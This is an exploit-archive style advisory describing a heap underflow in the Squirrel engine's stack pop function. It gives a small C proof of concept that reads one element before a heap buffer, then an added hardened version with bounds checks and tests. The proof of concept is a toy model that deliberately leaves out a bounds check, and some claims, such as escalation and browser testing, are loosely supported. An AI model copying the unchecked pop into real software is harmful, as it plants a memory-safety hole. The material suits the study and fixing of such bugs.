=============================================================================================================================================
| # Title : Squirrel Heap Underflow in Stack Pop Function Leading to Out-of-Bounds Read |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : http://squirrel-lang.org/ |
=============================================================================================================================================

[+] Summary :

A vulnerability exists in the Squirrel engine's stack implementation due to missing bounds checking in the PopTarget function. When a pop is attempted on an empty stack (size == 0), the function reads data[size - 1], i.e. data[-1], one element before the start of the heap allocation: a heap buffer underflow.

[+] This allows:

- Information disclosure (heap metadata or adjacent memory content)
- Application crashes (segmentation faults)
- Potential escalation if the leaked memory affects control flow

[+] Vulnerability Type: Out-of-Bounds Read / Heap Underflow

[+] Affected Component: Stack management in Squirrel Engine

[+] Save as: poc.c

[+] Compile with AddressSanitizer protection (recommended) :

gcc -fsanitize=address -g poc.c -o poc

[+] Run :

./poc

[+] ASAN reports an error similar to:

heap-buffer-overflow READ of size 8

[+] POC :

#include <stdio.h>
#include <stdlib.h>

/* Minimal model of the engine's target stack: a heap buffer plus size/capacity. */
typedef struct {
    long long *data;
    int size;
    int capacity;
} TargetStack;

/* Vulnerable pop: no check that size > 0 before indexing data[size - 1].
   With size == 0 this reads data[-1], 8 bytes before the allocation. */
long long PopTarget(TargetStack *stack) {
    long long target = stack->data[stack->size - 1];
    stack->size--;
    return target;
}

int main() {
    TargetStack stack;
    stack.capacity = 4;
    stack.size = 0;
    stack.data = (long long *)malloc(stack.capacity * sizeof(long long));
    if (stack.data == NULL) return 1;

    printf("Starting PoC...\n");
    printf("Stack size: %d\n", stack.size);
    printf("Attempting to PopTarget from empty stack...\n");

    /* Triggers the out-of-bounds read; ASAN flags it as heap-buffer-overflow. */
    long long leaked_data = PopTarget(&stack);
    printf("Leaked data from index [-1]: %lld\n", leaked_data);

    free(stack.data);
    return 0;
}

Greetings to :

======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)
====================================================================================
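For comparison with the PoC above, the following is an added example of what the missing bounds check looks like in a hardened pop routine. It is not code from the advisory author or from the Squirrel project; the struct mirrors the PoC's TargetStack, and the function and status names (stack_pop_checked, STACK_EMPTY, and so on) are assumptions chosen for this example, not Squirrel's own API. The pop reports an empty stack as an error instead of indexing data[-1], and the push gets the symmetric capacity check on the other end.

```c
#include <stdio.h>
#include <stdlib.h>

/* Same shape as the advisory's TargetStack. Names below are assumed for this
   example and are not Squirrel's own identifiers. */
typedef struct {
    long long *data;
    int size;
    int capacity;
} TargetStack;

/* Status codes: the fix is that an empty stack is reported, never read. */
enum { STACK_OK = 0, STACK_EMPTY = -1, STACK_FULL = -2 };

static int stack_init(TargetStack *s, int capacity)
{
    s->data = malloc((size_t)capacity * sizeof *s->data);
    if (s->data == NULL) return -1;
    s->size = 0;
    s->capacity = capacity;
    return 0;
}

static void stack_free(TargetStack *s)
{
    free(s->data);
    s->data = NULL;
    s->size = s->capacity = 0;
}

/* Bounded push: refuses to write past capacity. */
static int stack_push_checked(TargetStack *s, long long v)
{
    if (s->size >= s->capacity) return STACK_FULL;
    s->data[s->size++] = v;
    return STACK_OK;
}

/* Hardened pop: the size check the PoC's PopTarget lacks. The value goes out
   through a pointer so a caller cannot consume a value that was never there. */
static int stack_pop_checked(TargetStack *s, long long *out)
{
    if (s->size <= 0) return STACK_EMPTY;   /* would otherwise read data[-1] */
    s->size--;
    *out = s->data[s->size];
    return STACK_OK;
}

/* The advisory's scenario: pop on an empty stack. Returns STACK_EMPTY only if
   the pop was refused, the sentinel was left untouched and size stayed 0. */
int demo_pop_empty_status(void)
{
    TargetStack s;
    long long v = 0x1234;  /* sentinel: must survive the failed pop */
    if (stack_init(&s, 4) != 0) return -99;
    int rc = stack_pop_checked(&s, &v);
    int untouched = (v == 0x1234) && (s.size == 0);
    stack_free(&s);
    return (rc == STACK_EMPTY && untouched) ? STACK_EMPTY : -98;
}

/* Round trip: the checked version still behaves as a stack, and the fifth
   push into a capacity-4 buffer is rejected rather than overflowing. */
long long demo_round_trip(void)
{
    TargetStack s;
    long long sum = 0, v;
    if (stack_init(&s, 4) != 0) return -1;
    for (long long i = 1; i <= 4; i++) stack_push_checked(&s, i * 10);
    int rc_full = stack_push_checked(&s, 50);
    while (stack_pop_checked(&s, &v) == STACK_OK) sum += v;
    stack_free(&s);
    return rc_full == STACK_FULL ? sum : -2;  /* 10+20+30+40 = 100 */
}

int main(void)
{
    printf("pop on empty stack -> status %d (expected %d)\n",
           demo_pop_empty_status(), STACK_EMPTY);
    printf("round trip sum -> %lld (expected 100)\n", demo_round_trip());
    return 0;
}
```

Built with the same `gcc -fsanitize=address -g` line as the PoC, this version produces no ASAN report: the empty-stack pop returns STACK_EMPTY without touching memory, which is the check a fix for the advisory's PopTarget needs.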